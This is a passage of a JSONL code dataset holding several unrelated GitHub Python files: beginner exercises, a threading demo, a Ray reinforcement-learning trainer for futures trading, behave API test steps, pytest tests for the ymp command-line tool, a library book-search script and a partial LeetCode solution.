n)\n\n\nrun_gen4(3)\nprint(len(res))\n","repo_name":"movalex/yandex-code","sub_path":"generate_parentheses.py","file_name":"generate_parentheses.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"70098888480","text":"import math\n\nprint(\"If/Elif/Else Statements\")\nname = 12243\n# name = \"John\"\n# name = False\nif type(name) == str:\n print(\"Your name is {0}\".format(name))\nelif type(name) == bool:\n print(\"Your name can't be a Boolean\")\nelse:\n print(\"Your name must be a String\")\n \nprint(\"\\r\\nDetermining Position on a Number Line\")\nfor x in range(10):\n if x <= 3:\n print(x, \" is less than or equal to 3\")\n elif x > 5:\n print(x, \" is greater than 5\")\n else:\n print(x, \" is 4 or 5\")\n \nprint(\"\\r\\nSum of Even and Sum of Odd Numbers\")\nN = 100\neven = 0\nodd = 0\nfor i in range(N):\n if i % 2 == 0:\n even += i\n else:\n odd += i\nprint(\"Even Sum: \", even)\nprint(\"Odd Sum: \", odd)\n\n\n\nprint(\"\\r\\nWhile Loop\")\ni = 0\nwhile i < 10:\n print(\"i = \", i)\n i += 1\nelse:\n print(\"The last value was \", i)\n \nprint(\"\\r\\nE2.22: Euclid's Algorithm\")\na, b = 1071, 462\nwhile b:\n # b is True while > 0\n print(\"a = {0:4}\\tb = {1:4}\\ta % b = {2:4}\".format(a, b, a % b))\n # {0:4} in the above will limit the length of the string to 4\n a, b = b, a % b\nprint(\"Greatest common divisor = \", a)\n\nprint(\"\\r\\nP2.5.2\")\nH = 0\nc = 0.01\nKa = 1.78e-5\nTOL = 1e-10\ndPH = 1\ncounter = 0\nwhile dPH > TOL:\n Hp = math.sqrt(Ka * (c - H))\n dPH = Hp - H\n H = Hp\n counter += 1\n if counter > 100:\n break\nprint(\"PH: {0:.2f}\".format(-math.log(H, 10)))\n\n\n\nprint(\"\\r\\nBreak Command\")\n# Ends loop\ni = 0\nwhile True:\n i += 1\n if i % 2 == 0:\n print(i, \" is even\")\n else:\n print(i, \" is odd\")\n if i >= 10:\n break\n \nprint(\"\\r\\nPass Command\")\n# Skips over a section\nfor i in range(10):\n if i % 2 == 0:\n pass\n else:\n print(i, \" is odd\")\n \nprint(\"\\r\\nContinue Command\")\n# Ends current iteration and moves onto next\nfor i in range(10):\n if i % 2 == 0:\n continue\n else:\n print(i, \" is odd\")\n \n \n \nprint(\"\\r\\nQ2.5.1\")\na = [2, 4, 10, 6, 8, 4]\nlow = min(a)\nhigh = max(a)\nout = []\nfor i in a:\n out.append((i - low) / (high - low))\nprint(out)","repo_name":"acbarker19/PHY299-Class-Assignments","sub_path":"Notes/notes_conditional_statements.py","file_name":"notes_conditional_statements.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"21913456805","text":"'''\nLevantando os próprios erros com Raise\n\n*OBS: Não é uma função, e sim uma palavra revervada (como o def)\n\nraise -> lança exceções\n\nÉ útil para criarmos nossas próprias exceções e mensagens de erro\n\nComo usar:\n\nraise TipoDoErro('mensagem de erro')\n\n\nOBS: O raise, assim como o return, finaliza o bloco de função. Ou seja, nada pode ser executado\napós a execução do raise\n'''\n\n#raise ValueError('Valor incorreto')\n\nprint('\\n')\n\n# Exemplos:\n\ndef colore(texto, cor):\n cores = ('verde', 'amarelo', 'vermelho', 'azul')\n if type(texto) is not str:\n raise TypeError('Texto precisa ser uma string')\n if cor not in cores:\n raise ValueError('Cor não permitida')\n if type(cor) is not str:\n raise TypeError('Cor precisa ser uma string')\n return f'O texto {texto} é da cor {cor}'\n\n\nprint(colore('Felipe', 'verde'))\nprint(colore('Cesar', 'vermelho'))\nprint(colore('Camila', 'cinza')) # ValueError: Cor não permitida\n\n#print(colore('Felipe', 6)) # TypeError: Cor precisa ser uma string\n\nprint(colore(4, 'azul')) # TypeError: Texto precisa ser uma string","repo_name":"feliperfdev/100daysofcode-1","sub_path":"Introdução ao Python/week2/day11/levantando_erros.py","file_name":"levantando_erros.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"70078693918","text":"import random\r\nimport threading\r\nimport time\r\n\r\n\r\ndef list_append(count, id, out_list):\r\n for i in range(count):\r\n out_list.append(random.random())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n start_time = time.time()\r\n\r\n for xx in range(0, 50):\r\n size = 3000000\r\n threads = 8 # we will run 9 processes\r\n\r\n jobs = []\r\n for i in range(0, threads):\r\n out_list = list()\r\n thread = threading.Thread(target=list_append, args=(size, i, out_list)) # Create a process object and set the constructor\r\n jobs.append(thread)\r\n\r\n # Start the processes (i.e. calculate the random number lists)\r\n for j in jobs:\r\n j.start()\r\n\r\n # Ensure all of the processes have finished\r\n for j in jobs:\r\n j.join()\r\n\r\n '''Time the program'''\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n","repo_name":"hz336/Algorithm","sub_path":"LeetCode/Design/! threading.py","file_name":"! threading.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"42244167384","text":"\n\nfrom pprint import pprint\nfrom .envs import FuturesEnvV3_1 as FuturesEnv\nfrom .algos import Algos\nimport gym\nfrom ray import air, tune\nfrom ray.air.result import Result\nfrom ray.air.callbacks.wandb import WandbLoggerCallback\nimport ray\nfrom datetime import date, datetime\n\nfrom utils.utils import Interval, max_step_by_day\nfrom utils.api import API\n# from .envs import FuturesEnvV2_2 as FuturesEnv\n\nclass RLTrainer:\n def __init__(self, account: str = \"a4\", train_type: str = \"tune\"):\n print(\"Initializing RL trainer\")\n auth = API(account=account).auth\n self.train_type = train_type # tune or train\n self.algo_name = \"A3C\"\n\n self.wandb_name = self.algo_name + \"_\" + datetime.now().strftime(\n \"%Y-%m-%d_%H-%M-%S\") if self.train_type == \"train\" else False\n self.project_name = \"futures-alpha-8\"\n INTERVAL = Interval()\n self.interval = INTERVAL.ONE_SEC\n self.max_steps = max_step_by_day[self.interval]\n self.training_iteration = dict({\n INTERVAL.ONE_MIN: 100,\n INTERVAL.FIVE_SEC: 400,\n INTERVAL.ONE_SEC: 500,\n })\n # only trainer mode will log to wandb in env\n self.env_config = {\n \"auth\": auth,\n \"symbols\": [\"cotton\"],\n # \"symbols\": [\"sliver\"],\n \"start_dt\": date(2016, 1, 1),\n \"end_dt\": date(2022, 8, 1),\n \"live_market\": False,\n \"live_account\": None,\n \"wandb\": self.wandb_name,\n \"is_offline\": True,\n \"max_sample_size\": 1e6,\n \"project_name\": self.project_name,\n \"interval\": self.interval,\n \"max_steps\": self.max_steps,\n \"high_freq\": True,\n }\n self.env = FuturesEnv\n\n ray.init(logging_level=20, num_cpus=62, num_gpus=1, include_dashboard=False)\n\n def train(self,):\n is_tune = self.train_type == \"tune\"\n algos = Algos(name=self.algo_name, env=self.env,\n env_config=self.env_config, is_tune=is_tune)\n if is_tune:\n # use tuner\n stop = {\n \"training_iteration\": self.training_iteration[self.interval],\n \"episode_reward_min\": 1,\n }\n cb = [WandbLoggerCallback(\n project=self.project_name,\n group=\"tune_\" + self.interval,\n log_config=True,\n )]\n tuner = tune.Tuner(self.algo_name, param_space=algos.config,\n run_config=air.RunConfig(\n verbose=1,\n stop=stop,\n checkpoint_config=air.CheckpointConfig(\n checkpoint_frequency=100),\n callbacks=cb\n ))\n results = tuner.fit()\n metric = \"episode_reward_mean\"\n best_result: Result = results.get_best_result(metric, mode=\"max\")\n print(\"Best result:\", best_result)\n print(\"Checkpoints path:\", best_result.best_checkpoints)\n else:\n # use trainer\n trainer = algos.trainer\n print(algos.config)\n for i in range(self.training_iteration[self.interval]*10):\n result = trainer.train()\n self.logging(result)\n if i % 500 == 0:\n print(pprint(result))\n checkpoint = trainer.save(checkpoint_dir=\"checkpoints\")\n print(\"checkpoint saved at\", checkpoint)\n ray.shutdown()\n\n def run(self, checkpoint_path, max_episodes: int = 1000):\n trainer = Algos(name=self.algo_name, env=self.env,\n env_config=self.env_config, train_type=self.train_type).trainer\n trainer.restore(checkpoint_path)\n print(\"Restored from checkpoint path\", checkpoint_path)\n\n env = gym.make(self.env, config=self.env_config)\n obs = env.reset()\n\n step = 0\n while step < max_episodes:\n action = trainer.compute_single_action(obs)\n obs, reward, done, info = env.step(action)\n info[\"reward\"] = reward\n if done:\n step += 1\n obs = env.reset()\n ray.shutdown()\n\n def logging(self, result):\n print(\"timers\", result['timers'])\n print(\"info\", result['info'])\n # print(\"sampler_results\", result['sampler_results'])\n # def wandb_log(result):\n # wandb.config.update({result['config']})\n # for k in result['info'].keys():\n # wandb.log(data={\"info/\" + k: result['info'][k]})\n # wandb.log(\n # data={\"info/num_agent_steps_trained\": result['num_agent_steps_trained']})\n # for k in result['sampler_perf'].keys():\n # wandb.log(data={\"sampler_perf/\" +\n # k: result['sampler_perf'][k]})\n # for k in result['sampler_results'].keys():\n # wandb.log(\n # data={\"sampler_results/\" + k: result['sampler_results'][k]})\n\n def predict(self):\n pass\n\n def save(self):\n pass\n\n def load(self):\n pass\n","repo_name":"dyllanwli/cta-rl-tqsdk","sub_path":"src/policies/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"24786282656","text":"import json\nimport os\nimport requests\nfrom jsonschema import validate\nfrom behave import given, when, then, step\n\nBASE_URL = 'http://www.alphavantage.co/query?'\nSCHEMA_PATH = os.getcwd() + '/Schema/'\nhttp_request_header = {}\nhttp_request_body = {}\nglobal_general_variables = {}\n\n\n@when('I retrieve the results')\ndef step_impl(context):\n context.status_code = global_general_variables['response_full'].status_code\n context.data = global_general_variables['response_full'].json()\n\n\n@given('Set HEADER param request content type as \"{header_content_type}\"')\ndef step_impl(context, header_content_type):\n http_request_header['content-type'] = header_content_type\n\n\n@given('Set HEADER param response accept type as \"{header_accept_type}\"')\ndef step_impl(context, header_accept_type):\n http_request_header['Accept'] = header_accept_type\n\n\n@then('the status code should be \"{status_code}\"')\ndef step_impl(context, status_code):\n assert (int(global_general_variables['response_full'].status_code) == int(status_code))\n\n\n@when('I Raise \"{http_request_type}\" HTTP request with endpoint \"{endpoint}\"')\ndef step_impl(context, http_request_type, endpoint):\n end_url = BASE_URL\n if 'GET' == http_request_type:\n end_url += endpoint\n global_general_variables['response_full'] = requests.get(end_url)\n elif 'POST' == http_request_type:\n global_general_variables['response_full'] = requests.post(end_url,\n headers=http_request_header,\n data=http_request_body)\n\n\n@then('Response HEADER content type should be \"{expected_response_content_type}\"')\ndef step_impl(context, expected_response_content_type):\n assert (expected_response_content_type == global_general_variables['response_full'].headers['Content-Type'])\n\n\n@then('it should have the field \"{field}\"')\ndef step_impl(context, field):\n assert (field in context.data)\n\n\n@then('request structure corresponds to the scheme \"{schema_file}\"')\ndef step_impl(context, schema_file):\n with open(SCHEMA_PATH + schema_file, 'r', encoding='utf-8') as f:\n file = json.load(f)\n validate(context.data, file)\n","repo_name":"ramukunireddy6/python-bdd-automation","sub_path":"feature/steps/step_def.py","file_name":"step_def.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40179899036","text":"import logging\nimport os\n\nimport click\n\nimport pytest\n\nimport ymp\ncfg = ymp.get_config()\n\nlog = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef test_submit_no_profile(invoker):\n \"Running submit without profile should raise UsageError\"\n with pytest.raises(click.UsageError):\n invoker.call(\"submit\")\n\n\ndef test_submit_profile_cfg(invoker, saved_tmpdir):\n \"Test profile set from config\"\n with open(\"ymp.yml\", \"w\") as ymp_yml:\n ymp_yml.write(\"cluster:\\n profile: dummy\")\n invoker.call(\"submit\", cfg.dir.reports)\n assert os.path.isdir(cfg.dir.reports)\n\n\n# - don't test profiles that have no command set on them (default profile)\n# - sort profiles so we can test in parallel reliably\nprofiles = sorted((name, profile)\n for name, profile in cfg.cluster.profiles.items()\n if profile.get('command'))\n\n\n@pytest.mark.parametrize(\n \"mock_cmd,prof_name,prof_cmd\",\n [((profile.command.split()[0], '#!/bin/bash\\nexec \"$@\"\\n'),\n name, profile.command)\n for name, profile in profiles],\n ids=[name for name, profile in profiles],\n indirect=['mock_cmd'])\ndef test_submit_profiles(invoker, mock_cmd, prof_name, prof_cmd):\n invoker.call(\"submit\",\n \"--profile\", prof_name,\n \"--command\", prof_cmd,\n cfg.dir.reports)\n assert os.path.isdir(cfg.dir.reports)\n\n\ndef test_show(invoker, saved_tmpdir):\n \"Test parts of show\"\n with open(\"ymp.yml\", \"w\") as cfg:\n cfg.write(\"conda:\\n testme: [X1,X2]\")\n\n invoker.call(\"show\")\n res = invoker.call(\"show\", \"pairnames\")\n assert res.output.strip() == '- R1\\n- R2'\n res = invoker.call(\"show\", \"pairnames[1]\")\n assert res.output.strip() == 'R2'\n res = invoker.call(\"show\", \"cluster.profiles.default.drmaa\")\n assert res.output.strip() == 'False'\n\n res = invoker.call(\"show\", \"conda.testme\")\n assert res.output.strip() == '- X1\\n- X2'\n\n\ndef test_stage_list(invoker):\n \"List all stages\"\n res = invoker.call(\"stage\", \"list\")\n assert \"\\ncheck \" in res.output\n\n with pytest.raises(click.UsageError):\n res = invoker.call(\"stage\", \"list\", \"-s\", \"-l\")\n\n res = invoker.call(\"stage\", \"list\", \"does_not_exist\")\n assert res.output == \"\"\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-s\")\n assert res.output.strip() == \"check\"\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-l\")\n assert res.output.startswith(\"check\")\n assert res.output.count(\"\\n\") > 3\n\n res = invoker.call(\"stage\", \"list\", \"ch?ck\", \"-c\")\n assert res.output.startswith(\"check\")\n assert \"test.rules:\" in res.output\n assert res.output.count(\"\\n\") == 3\n\n\ndef test_func_get_envs():\n \"Test env cli helper function get_envs\"\n from ymp.cli.env import get_envs\n cfg.unload()\n\n envs = get_envs()\n log.debug(\"envs found: %s\", envs)\n assert 'bbmap' in envs\n assert 'bmtagger' in envs\n\n envs = get_envs('bbmap')\n assert len(envs) == 1\n\n envs = get_envs(['bbmap', 'bmtagger'])\n assert len(envs) == 2\n\n envs = get_envs(['bb?ap', 'bmtagger*'])\n assert len(envs) == 2\n\n\ndef test_env_list(invoker):\n \"\"\"Test listing environments\n\n - w/o args\n - reverse sorted\n - sorted by hash\n \"\"\"\n res = invoker.call(\"env\", \"list\")\n lines = res.output.splitlines()\n assert len(lines) > 2\n assert lines[0].startswith(\"name\"), \"first row should start with name\"\n assert all(lines[i].upper() <= lines[i+1].upper()\n for i in range(2, len(lines)-1)), \\\n f\"output should be sorted: {lines}\"\n\n res = invoker.call(\"env\", \"list\", \"-r\")\n lines = res.output.splitlines()\n assert all(lines[i].upper() >= lines[i+1].upper()\n for i in range(1, len(lines)-1)), \\\n f\"output should be sorted reverse:\\n{lines}\"\n\n res = invoker.call(\"env\", \"list\", \"-s\", \"hash\")\n lines = res.output.splitlines()\n hash_col = lines[0].split().index(\"hash\")\n hashes = [line.split()[hash_col] for line in lines]\n assert all(hashes[i] <= hashes[i+1]\n for i in range(1, len(lines)-1)), \\\n f\"output should be sorted by hash:\\n{hashes[1:]}\"\n\n\ndef test_env_prepare(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test passing through to snakemake prepare\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\")\n res = invoker.call(\"env\", \"list\", \"bbmap\")\n lines = res.output.splitlines()\n col = lines[0].index(\"installed\")\n assert lines[1][col:col+len(\"False\")] == \"False\"\n invoker.initialized = False\n res = invoker.call(\"env\", \"prepare\", \"toy.trim_bbmap\")\n\n res = invoker.call(\"env\", \"list\", \"bbmap\")\n lines2 = res.output.splitlines()\n col = lines2[0].index(\"installed\")\n assert lines2[1][col:col+len(\"True\")] == \"True\", \"\\n\".join(lines + lines2)\n\n conda_cmd = mock_conda.calls[-1]\n assert \"conda create\" in conda_cmd\n assert \"/bbmap-\" in conda_cmd\n\n\ndef test_env_install(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test installing environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n # basic\n res = invoker.call(\"env\", \"install\", \"bbmap\")\n assert \"Creating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n n_calls = len(mock_conda.calls)\n\n # no double install\n res = invoker.call(\"env\", \"install\", \"bbmap\")\n assert len(mock_conda.calls) == n_calls\n\n # remove bbmap env\n res = invoker.call(\"env\", \"remove\", \"bbmap\")\n\n # multiple, globbing\n res = invoker.call(\"env\", \"install\", \"bb?ap\", \"bbma*\")\n assert \"Creating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n assert len(mock_conda.calls) == n_calls + 1\n\n # dynamic env\n res = invoker.call(\"env\", \"install\", \"sickle\")\n assert \"Creating 1 environments\" in res.output\n assert \"'sickle'\" in res.output\n assert \"--prefix \"+str(demo_dir) in mock_conda.calls[-1]\n\n\ndef test_env_update(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test updating environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n # basic\n res = invoker.call(\"env\", \"update\", \"bbmap\")\n assert \"Updating 1 environments\" in res.output\n assert \"'bbmap'\" in res.output\n assert \"conda create\" in mock_conda.calls[-2]\n assert \"conda env update\" in mock_conda.calls[-1]\n\n\ndef test_env_export(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test exporting environments\"\"\"\n # install envs locally\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n # skip and create are mutually exclusive\n with pytest.raises(click.UsageError) as exc:\n invoker.call(\"env\", \"export\", \"-sc\", \"bbmap\")\n assert exc.match(\"mutually exclusive\")\n\n # fail if trying to export uninstalled env\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"bbmap\")\n assert exc.match(\"uninstalled\")\n\n # exporting nothing\n res = invoker.call(\"env\", \"export\", \"-qs\", \"bbmap\")\n assert res.output == \"\"\n\n # creating bbmap.yml\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\", \"-c\")\n assert \"Exporting\" in res.output\n\n # fail, file exists\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\")\n assert exc.match(\"exists\")\n\n # allow overwrite\n res = invoker.call(\"env\", \"export\", \"-d\", \".\", \"bbmap\", \"-f\")\n assert \"Exporting\" in res.output\n\n # try txt format and export to file\n res = invoker.call(\"env\", \"export\", \"-d\", \"bbmap.txt\", \"bbmap\")\n assert \"conda list\" in mock_conda.calls[-1]\n\n # export multiple, fail\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"export\", \"-cd\", \".\", \"bbmap\", \"sambamba\")\n assert exc.match(\"exists\")\n\n # export multiple\n res = invoker.call(\"env\", \"export\", \"-fcd\", \".\", \"bbmap\", \"sambamba\")\n assert \"Exporting 2 \" in res.output\n\n # export multiple to stdout\n res = invoker.call(\"env\", \"export\", \"-q\", \"bbmap\", \"sambamba\")\n names = [line[6:] for line in res.output.splitlines()\n if line.startswith(\"name: \")]\n assert sorted(names) == [\"bbmap\", \"sambamba\"]\n\n # export no matching patterns\n res = invoker.call(\"env\", \"export\", \"does_not_match_anything\")\n assert \"Nothing to export\" in res.output\n\n # export everything installed\n res = invoker.call(\"env\", \"export\", \"-s\")\n names = [line[6:] for line in res.output.splitlines()\n if line.startswith(\"name: \")]\n assert sorted(names) == [\"bbmap\", \"sambamba\"]\n\n\ndef test_env_clean(invoker, demo_dir, mock_conda):\n \"\"\"Test cleaning environments\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n\ndef test_env_activate(invoker, demo_dir, mock_conda, mock_downloader):\n \"\"\"Test activating an environment\"\"\"\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n res = invoker.call(\"env\", \"activate\", \"bbmap\")\n assert str(demo_dir) in res.output\n\n\ndef test_env_run(invoker, demo_dir, mock_conda, mock_downloader, capfd):\n with open(\"ymp.yml\", \"a\") as f:\n f.write(\"directories:\\n conda_prefix: '.'\\nconda:\\n frontend: conda\\n\")\n\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"run\", \"bbmapx\", \"bbmap.sh\")\n assert exc.value.message == \"Environment bbmapx unknown\"\n\n with pytest.raises(click.UsageError) as exc:\n res = invoker.call(\"env\", \"run\", \"*\", \"bbmap.sh\")\n assert exc.value.message.startswith(\"Multiple environments match\")\n\n res = invoker.call(\"env\", \"run\", \"bbmap\", \"true\")\n assert res.exit_code == 0\n cap = capfd.readouterr()\n assert \"bin/activate: No such file \" in cap.err\n\n\n@pytest.mark.parametrize(\n \"comp_words,exp_len,exp_res\",\n [\n [\"ymp make\", 6, {\n \"toy\", \"toy.\", \"mpic\", \"mpic.\"\n }],\n [\"ymp make t\", 2, {\n \"toy\", \"toy.\"\n }],\n [\"ymp make toy.\", -1, {\n \"toy.assemble_\", \"toy.trim_\"\n }],\n [\"ymp make toy.assemble_\", -1, {\n \"toy.assemble_megahit\",\n \"toy.assemble_megahit.\"\n }],\n [\"ymp make toy.assemble_megahit.\", -1, {\n \"toy.assemble_megahit.trim_\",\n \"toy.assemble_megahit.map_\"\n }],\n [\"ymp make toy.assemble_megahit.map_\", -1, {\n \"toy.assemble_megahit.map_bbmap\",\n }],\n [\"ymp make toy.map_bowtie2.\", 0, set()],\n [\"ymp make toy.group_\", 16, {\n \"toy.group_name\", \"toy.group_Subject\",\n \"toy.group_name.\", \"toy.group_Subject.\",\n \"toy.group_ALL.\", \"toy.group_ALL\",\n }],\n ]\n)\ndef test_completion(\n # fixtures:\n invoker, demo_dir, capfd, envvar,\n # parameters:\n comp_words, # command line prefix to expand\n exp_len, # expected number of result options (or -1)\n exp_res # (subset of) expected result options\n):\n import subprocess as sp\n envvar('YMP_DEBUG_EXPAND', 'stderr')\n envvar('_YMP_COMPLETE', 'complete-bash')\n envvar('COMP_CWORD', '2')\n envvar('COMP_WORDS', comp_words)\n sp.run([\"python\", \"-m\", \"ymp\"])\n cap = capfd.readouterr()\n result = set(cap.out.split())\n\n if exp_len != -1:\n assert len(result) == exp_len, \\\n f\"Expected {exp_len} results for '{comp_words}' but got\" \\\n f\" {len(result)}:\\n\" \\\n f\"{result}\"\n\n assert exp_res.issubset(result), \\\n f\"Completion for '{comp_words}' is missing: {exp_res - result}\"\n","repo_name":"epruesse/ymp","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":11887,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"51"} +{"seq_id":"15292242434","text":"\"\"\"\nЛабораторная работа №14 - Моделирование.\nВ данной лабораторной работе использованы средства языка Python для\nанализа и прогнозирования стоимости акций компаний (построение финансовой модели).\n\"\"\"\n\nfrom stocker.stocker import Stocker\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n\n microsoft = Stocker('MSFT')\n # Вывод графика стоимости акций компании Microsoft\n microsoft.plot_stock()\n microsoft.plot_stock(start_date='2000-01-03', end_date='2018-01-16', stats=['Daily Change', 'Adj. Volume'], plot_type='pct')\n microsoft.buy_and_hold(start_date='1986-03-13',\n end_date='2018-01-16', nshares=100)\n model, model_data = microsoft.create_prophet_model()\n # model и model_data из предыдущего вызова функций\n model.plot_components(model_data)\n plt.show()\n print(microsoft.weekly_seasonality)\n microsoft.weekly_seasonality = True\n print(microsoft.weekly_seasonality)\n model, future = microsoft.create_prophet_model(days=2000)","repo_name":"webclinic017/LabsAiVD","sub_path":"Lab14/lr14.py","file_name":"lr14.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10407202311","text":"###booksearch funtions\nfrom Database import *\nstring_search =[]\nbook_by_string=[]\nBook_found = \"None\"\ndef booksearch(bookrequest):\n '''\nThis function allows the user to search for a book, in the system.\nThis is through user input by the librarian. The librarian must either\nenter the entire name of the book or a phrase e.g. \"Lord of the rings\",\"lord\" or \"rings\"\nin order to get a match.\n'''\n occur = 0\n found = 3\n f=open(\"Database.txt\",\"r\")\n for line in f:\n line = line.strip()\n line = line.split(',')\n #adds books the database so that they can be critique\n book_database.append([str(line[0].replace('[','')),line[1],line[2],line[3],line[4],str(line[5].replace(']','') )])\n Books = [i[1].replace('\"',\"\").strip().lower() for i in book_database] #takes all the book titles and removes the white space\n # and also makes everything lowercase for validation\n search = bookrequest.split(\" \") # splits up the users input into a list of individual words\n search =[i.lower() for i in search]# makes each book lowercase\n if \"the\" in search:\n search.remove(\"the\") #removes the word 'the' from the search as it is a generic word\n if \"of\" in search:\n search.remove(\"of\") #removes the word 'of' from the search as it is a generic word\n #and slows down the search process\n for book in Books:\n book_by_string.append(book.split(\" \"))\n for item in book_by_string: #the code checks every element in book_by_String and checks across each word in the search list\n for j in search:\n if j in item:\n occur = occur +1\n if occur == 1:\n global Book_found\n Book_found = \" \".join(item) #once its found the book it joins the list of words together again but as a sentence\n confirm =input(\"Did you mean %s: \"%(Book_found))#validates it has found the right book\n if confirm.lower() == \"yes\":\n for i in book_database:\n if (i[1].lower()).strip() == Book_found and (i[3].strip() == \"'In Stock'\" or i[3].strip() == '\"In Stock\"'):\n found = 1\n #if the user inputs yes the book matches with the book in the database\n # prints that this book is in stock, if the loan_status is equal to \"In stock\"\n elif (i[1].lower()).strip() == Book_found and (i[3].strip() == \"'Out on Loan'\" or i[3].strip() == '\"Out on Loan\"'):\n found = 0\n #if the user inputs yes the book matches with the book in the database\n # prints that this book is not in stock, if the loan_status is equal to \"In stock\"\n book_by_string.clear()\n book_database.clear()\n break\n \n elif confirm.lower() == \"no\": #if the user says that it was not the right book\n print(\"Try again, please be more precise\")\n book_by_string.remove(item)# the incorrect book is removed from the list so that another book that is similar can be tried\n bookrequest = input(\"Please enter the name of the book you like to find: \")\n booksearch(bookrequest)\n\n else:\n print(\"Try again, please be more precise\")\n bookrequest = input(\"Please enter the name of the book you like to find: \")\n booksearch(bookrequest)# if the input is anything other than yes or no, then user is accessed to reenter their choice\n else:\n break\n \n if found == 1:\n print(\"This book is in stock\")\n elif found == 0:\n print(\"This book is not in stock\")\n \n \n else:\n if found == 3:\n print(\"Sorry this book is not in stock: %s\"%(bookrequest)) #if book title is not found at all then it says the book is not in stock\n Book_found = \"None\"\n \n book_by_string.clear()\n book_database.clear()\n\n \nbook_for_checkout = Book_found\n\nif __name__==\"__main__\":\n # testing search function\n request = [\"harry\",\"harry potter\",\"lord\",\"1\"]\n for i in request:\n booksearch(i)\n # results should be as follows\n # Output 1 = This is in Stock\n # Output 2 = This is in Stock\n # Output 3 = This is in Stock\n # Output 4 = Sorry this book is not in stock: 1\n","repo_name":"Tobstab/Library-System","sub_path":"booksearch.py","file_name":"booksearch.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22586349594","text":"# !/usr/bin/env python\n# coding: utf-8\n\"\"\"\nAuthor:\n Tian Gao (tgaochn@gmail.com)\nCreationDate:\n Fri, 09/04/2020, 18:21\n# !! Description:\nGiven a set of candidate numbers (candidates) (without duplicates) and a target number (target), find all unique combinations in candidates where the candidate numbers sums to target.\n\nThe same repeated number may be chosen from candidates unlimited number of times.\n\nNote:\n\nAll numbers (including target) will be positive integers.\nThe solution set must not contain duplicate combinations.\nExample 1:\n\nInput: candidates = [2,3,6,7], target = 7,\nA solution set is:\n[\n [7],\n [2,2,3]\n]\nExample 2:\n\nInput: candidates = [2,3,5], target = 8,\nA solution set is:\n[\n  [2,2,2,2],\n  [2,3,3],\n  [3,5]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/combination-sum\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\nimport sys\nsys.path.append('..')\nfrom utils import binaryTree\nfrom utils import singleLinkedList\nfrom utils import nTree\n\nListNode = singleLinkedList.ListNode\nTreeNode = binaryTree.TreeNode\nNode = nTree.Node\nnull = None\n\nclass Solution:\n def combinationSum1(self, candidates: List[int], target: int) -> List[List[int]]:\n \"\"\"\n backtracking\n \"\"\"\n\n rlt = []\n n = len(candidates)\n\n def bt(sol, curTar, i):\n # step 3: pruning\n if curTar < 0:\n return\n\n # step 1: end condition\n if i == n:\n if curTar == 0:\n rlt.append(sol)\n return \n \n # step 2: update answer and next step\n # case1: pick\n # case2: not pick and move to next\n bt(sol + [candidates[i]], curTar - candidates[i], i)\n bt(sol, curTar, i + 1)\n\n bt([], target, 0)\n return rlt\n # endFunc\n# endClass\n\ndef func():\n s = Solution()\n\n # !! change function name and para here\n myFuncLis = [\n s.combinationSum,\n ]\n inputParaLis1 = [\n [2, 3, 6, 7],\n # singleLinkedList.buildSingleList([])\n # 